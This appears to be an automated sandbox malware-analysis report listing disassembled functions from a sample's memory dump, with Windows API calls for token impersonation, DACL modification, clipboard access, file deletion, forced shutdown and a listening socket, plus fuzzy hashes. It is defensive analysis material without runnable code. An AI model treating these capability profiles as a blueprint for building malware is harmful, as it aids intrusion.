Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: f236cae54946c4617d6b6634b48a66734a0784ede5f780007d0704156b61b22c
Instruction ID: 95699d8ac82c11b9496c22f32373367133e119846621792dd646ee06b18a2513
Opcode Fuzzy Hash: f236cae54946c4617d6b6634b48a66734a0784ede5f780007d0704156b61b22c
Instruction Fuzzy Hash: CA120231620215AFEB25AF24DC49FAE7BF8AF86710F104129F915EA2E1DFB4D950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00271201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027170D
Part of subcall function 002716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027173A
Part of subcall function 002716C3: GetLastError.KERNEL32 ref: 0027174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00271286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002712A8
CloseHandle.KERNEL32(?), ref: 002712B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002712D1
GetProcessWindowStation.USER32 ref: 002712EA
SetProcessWindowStation.USER32 ref: 002712F4
OpenDesktopW.USER32 ref: 00271310

Part of subcall function 002710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002711FC), ref: 002710D4
Part of subcall function 002710BF: CloseHandle.KERNEL32(?), ref: 002710E9

Strings

Z-, xrefs: 00271392
, xrefs: 0027125A
default, xrefs: 0027130B
winsta0, xrefs: 002712CC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z-
API String ID: 22674027-3054849001
Opcode ID: 022dc057954556f95f74928e9954dc2f62c9682c23a4cdb40cfdcb5288e552ae
Instruction ID: 6cd19b745ef50f7d26400e0bfd3eacf1f0120e0859a5cedc86557a29380135d7
Opcode Fuzzy Hash: 022dc057954556f95f74928e9954dc2f62c9682c23a4cdb40cfdcb5288e552ae
Instruction Fuzzy Hash: 5281AF7191020AAFDF219FA8DC49FEE7BB9EF05704F148129F918A61A0DB708964CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00270B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00271114
Part of subcall function 002710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271120
Part of subcall function 002710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 0027112F
Part of subcall function 002710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271136
Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0027114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00270BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00270C00
GetLengthSid.ADVAPI32(?), ref: 00270C17
GetAce.ADVAPI32(?,00000000,?), ref: 00270C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00270C6D
GetLengthSid.ADVAPI32(?), ref: 00270C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00270C8C
HeapAlloc.KERNEL32(00000000), ref: 00270C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00270CB4
CopySid.ADVAPI32(00000000), ref: 00270CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00270CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00270D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00270D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270D45
HeapFree.KERNEL32(00000000), ref: 00270D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270D55
HeapFree.KERNEL32(00000000), ref: 00270D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270D65
HeapFree.KERNEL32(00000000), ref: 00270D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00270D78
HeapFree.KERNEL32(00000000), ref: 00270D7F

Part of subcall function 00271193: GetProcessHeap.KERNEL32(00000008,00270BB1,?,00000000,?,00270BB1,?), ref: 002711A1
Part of subcall function 00271193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00270BB1,?), ref: 002711A8
Part of subcall function 00271193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00270BB1,?), ref: 002711B7

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: b56a1218e9f42137b3874696181422bfe70dcab77d8c667182e2f3c1a2e0dc07
Instruction ID: 8ad556af6feab6ce9997c9092dc9f885812e84f4832ecaa8e5875e82bc0fe313
Opcode Fuzzy Hash: b56a1218e9f42137b3874696181422bfe70dcab77d8c667182e2f3c1a2e0dc07
Instruction Fuzzy Hash: 84715E7191020AEBDF10DFA4DC89FAEBBB8FF05310F148525F919A6291DB71A919CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0028EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(002ACC08), ref: 0028EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0028EB37
GetClipboardData.USER32 ref: 0028EB43
CloseClipboard.USER32 ref: 0028EB4F
GlobalLock.KERNEL32 ref: 0028EB87
CloseClipboard.USER32 ref: 0028EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0028EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0028EBC9
GetClipboardData.USER32 ref: 0028EBD1
GlobalLock.KERNEL32 ref: 0028EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0028EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0028EC38
GetClipboardData.USER32 ref: 0028EC44
GlobalLock.KERNEL32 ref: 0028EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0028EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0028EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0028ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0028ECF3
CountClipboardFormats.USER32 ref: 0028ED14
CloseClipboard.USER32 ref: 0028ED59

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: b47f3396a2949740bf5953141ccf839dd1da4066c5ccaac03a0d80e35bf0eaea
Instruction ID: c4e8d7f1e38a0d444e582051ec53179d4493905a0befa21f3a36c837d3391b7e
Opcode Fuzzy Hash: b47f3396a2949740bf5953141ccf839dd1da4066c5ccaac03a0d80e35bf0eaea
Instruction Fuzzy Hash: 3161EE782143029FD700EF20D888F6AB7E8AF95714F194519F856872E2DF30D959CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0028698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002869BE
FindClose.KERNEL32(00000000), ref: 00286A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00286A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00286A75

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00286AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00286ADF

Strings

%03d, xrefs: 00286DA2
%02d, xrefs: 00286C00, 00286C0A, 00286C5A, 00286CAA, 00286CFA, 00286D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00286B32
%4d, xrefs: 00286BB1
%4d%02d%02d%02d%02d%02d, xrefs: 00286B6A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 6182303b19680c45ebd033aad3d48a5149a976a5d5ad1b7a5855b5681772edea
Instruction ID: 26ebaef20e0b2cc474a3bde585cf5a2f7e7243dcfe719507f80d523a83e32b60
Opcode Fuzzy Hash: 6182303b19680c45ebd033aad3d48a5149a976a5d5ad1b7a5855b5681772edea
Instruction Fuzzy Hash: 7BD16F72518300AFC314EBA0D895EAFB7ECAF98704F04492EF585D7191EB74DA94CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00289642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00289663
GetFileAttributesW.KERNEL32(?), ref: 002896A1
SetFileAttributesW.KERNEL32(?,?), ref: 002896BB
FindNextFileW.KERNEL32(00000000,?), ref: 002896D3
FindClose.KERNEL32(00000000), ref: 002896DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002896FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0028974A
SetCurrentDirectoryW.KERNEL32(002D6B7C), ref: 00289768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00289772
FindClose.KERNEL32(00000000), ref: 0028977F
FindClose.KERNEL32(00000000), ref: 0028978F

Strings

*.*, xrefs: 002896F5

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: ec834186ef073b227b9ff8d162f5016e21113984b9b21b18eaab3ce1f5daa090
Instruction ID: 898ad8c9159bcd1417db76adf9115c28ffd2b12cf9da9138a4ee90a821451c81
Opcode Fuzzy Hash: ec834186ef073b227b9ff8d162f5016e21113984b9b21b18eaab3ce1f5daa090
Instruction Fuzzy Hash: AA31B47652121A6BDB10AFB4EC0CAEE77AC9F4A320F184156E805E21D0EB30DD908B54

Uniqueness

Uniqueness Score: -1.00%

Function 0028979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 002897BE
FindNextFileW.KERNEL32(00000000,?), ref: 00289819
FindClose.KERNEL32(00000000), ref: 00289824
FindFirstFileW.KERNEL32(*.*,?), ref: 00289840
SetCurrentDirectoryW.KERNEL32(?), ref: 00289890
SetCurrentDirectoryW.KERNEL32(002D6B7C), ref: 002898AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002898B8
FindClose.KERNEL32(00000000), ref: 002898C5
FindClose.KERNEL32(00000000), ref: 002898D5

Part of subcall function 0027DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0027DB00

Strings

*.*, xrefs: 0028983B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 66ba20e1027f161f2b9710a1e03a5832a7fad76275368686edbd6c6804fbda08
Instruction ID: e66f2eafcb030a3f2aaca1957fea26586a33bc54d391b60e80aa37849f2e811f
Opcode Fuzzy Hash: 66ba20e1027f161f2b9710a1e03a5832a7fad76275368686edbd6c6804fbda08
Instruction Fuzzy Hash: 7731803551261B6BEF10AFA4EC48AEE77AC9F06324F284156E814A21D0DB70DEA4CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0027D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2

Part of subcall function 0027E199: GetFileAttributesW.KERNEL32(?,0027CF95), ref: 0027E19A

FindFirstFileW.KERNEL32(?,?), ref: 0027D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0027D1DD
MoveFileW.KERNEL32 ref: 0027D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0027D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0027D237

Part of subcall function 0027D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 0027D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0027D253
FindClose.KERNEL32(00000000), ref: 0027D264

Strings

\*.*, xrefs: 0027D0CD, 0027D0D6, 0027D0EB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 9577f4b3683aa34deebdfd575dec9ed9e4140625f7f70513cbb766a9cf8026a5
Instruction ID: a54118f6fa08ef0dd937775ea9ceac2e33192f904335ae6911637aa506b30f2c
Opcode Fuzzy Hash: 9577f4b3683aa34deebdfd575dec9ed9e4140625f7f70513cbb766a9cf8026a5
Instruction Fuzzy Hash: DA617E3181114D9BCF05EFE0D9529EDB7B5AF25300F2480A5E80A77192EB316FA9CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0028ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0028ED91
EmptyClipboard.USER32 ref: 0028ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0028EDAC
CloseClipboard.USER32 ref: 0028EEA3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: fe4c36a41a3c9f4c551ce1e6a17de686481ca3eb81cbade733e65bec24517a38
Instruction ID: ee774e7a52bb267f5f7e0f8970b8b6ad821fefea6faeeb7c4a6702f44f4c2862
Opcode Fuzzy Hash: fe4c36a41a3c9f4c551ce1e6a17de686481ca3eb81cbade733e65bec24517a38
Instruction Fuzzy Hash: F841CF79215612AFD710EF15E888F19BBE5EF45328F25C099E4158B6A2CB31EC52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0027E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027170D
Part of subcall function 002716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027173A
Part of subcall function 002716C3: GetLastError.KERNEL32 ref: 0027174A

ExitWindowsEx.USER32(?,00000000), ref: 0027E932

Strings

, xrefs: 0027E920
, xrefs: 0027E95C
@, xrefs: 0027E925
SeShutdownPrivilege, xrefs: 0027E902

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: f9bbe3c6180fe11c4a66285237b9542f8ec5dc38336df8c6388d13cba8211ada
Instruction ID: bab577856d3a057f208f49c66238a399c7c93df93a1defbd28cc152803e8e6aa
Opcode Fuzzy Hash: f9bbe3c6180fe11c4a66285237b9542f8ec5dc38336df8c6388d13cba8211ada
Instruction Fuzzy Hash: 4901DB73630211EBEF542674AC89BBB725C9B18750F168462FE06E21D1DAB05C6086B0

Uniqueness

Uniqueness Score: -1.00%

Function 00291204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00291276
WSAGetLastError.WSOCK32 ref: 00291283
bind.WSOCK32(00000000,?,00000010), ref: 002912BA
WSAGetLastError.WSOCK32 ref: 002912C5
closesocket.WSOCK32(00000000), ref: 002912F4
listen.WSOCK32(00000000,00000005), ref: 00291303
WSAGetLastError.WSOCK32 ref: 0029130D
closesocket.WSOCK32(00000000), ref: 0029133C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 6ce9a9f2e9f8300048b9d258b30cfbc99bb9c3ef3b3ada305ce8b08ef779e9c5
Instruction ID: 144c91d78e7858ed054b337d569a20ed7e9d946651188019e3134c7f2a5d8ab9
Opcode Fuzzy Hash: 6ce9a9f2e9f8300048b9d258b30cfbc99bb9c3ef3b3ada305ce8b08ef779e9c5
Instruction Fuzzy Hash: 1E419231A101129FDB10EF25D488B69BBF6BF46318F288198D8568F2D6C775EC91CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0027D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2

Part of subcall function 0027E199: GetFileAttributesW.KERNEL32(?,0027CF95), ref: 0027E19A

FindFirstFileW.KERNEL32(?,?), ref: 0027D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0027D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0027D481
FindClose.KERNEL32(00000000), ref: 0027D498
FindClose.KERNEL32(00000000), ref: 0027D4A1

Strings

\*.*, xrefs: 0027D3F2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 5ed2d4b41462922e62828f6d403b0e069f2f5dc7f4e5d9bef222cad33d2c66c0
Instruction ID: 30605bab8f5b54346aa228b64d2e8fec828e5840bfacd42620055cdb5d7f8659
Opcode Fuzzy Hash: 5ed2d4b41462922e62828f6d403b0e069f2f5dc7f4e5d9bef222cad33d2c66c0
Instruction Fuzzy Hash: 573192710283459BC300EF64D8658EF77E8BEA2310F44891DF4D552191EB30AA59DB63

Uniqueness

Uniqueness Score: -1.00%

Function 0024E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0024E645

Strings

1#IND, xrefs: 0024F83D
1#SNAN, xrefs: 0024F844
1#INF, xrefs: 0024F852
1#QNAN, xrefs: 0024F84B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6ed72740656227169ae0293a133a3de193c6c532380852a36dd952860dd02c6f
Instruction ID: b6ff2753abe119c877b8b54b1dbaa8569ebfe60bed8149c4f7c14885a5937232
Opcode Fuzzy Hash: 6ed72740656227169ae0293a133a3de193c6c532380852a36dd952860dd02c6f
Instruction Fuzzy Hash: 63C23872E246298FDF69CE289D407EAB7B5FB84304F1541EAD84DE7240E774AE918F40

Uniqueness

Uniqueness Score: -1.00%

Function 0028648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002864DC
CoInitialize.OLE32(00000000), ref: 00286639
CoCreateInstance.OLE32(002AFCF8,00000000,00000001,002AFB68,?), ref: 00286650
CoUninitialize.OLE32 ref: 002868D4

Strings

.lnk, xrefs: 002864BA, 00286524, 002865E0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
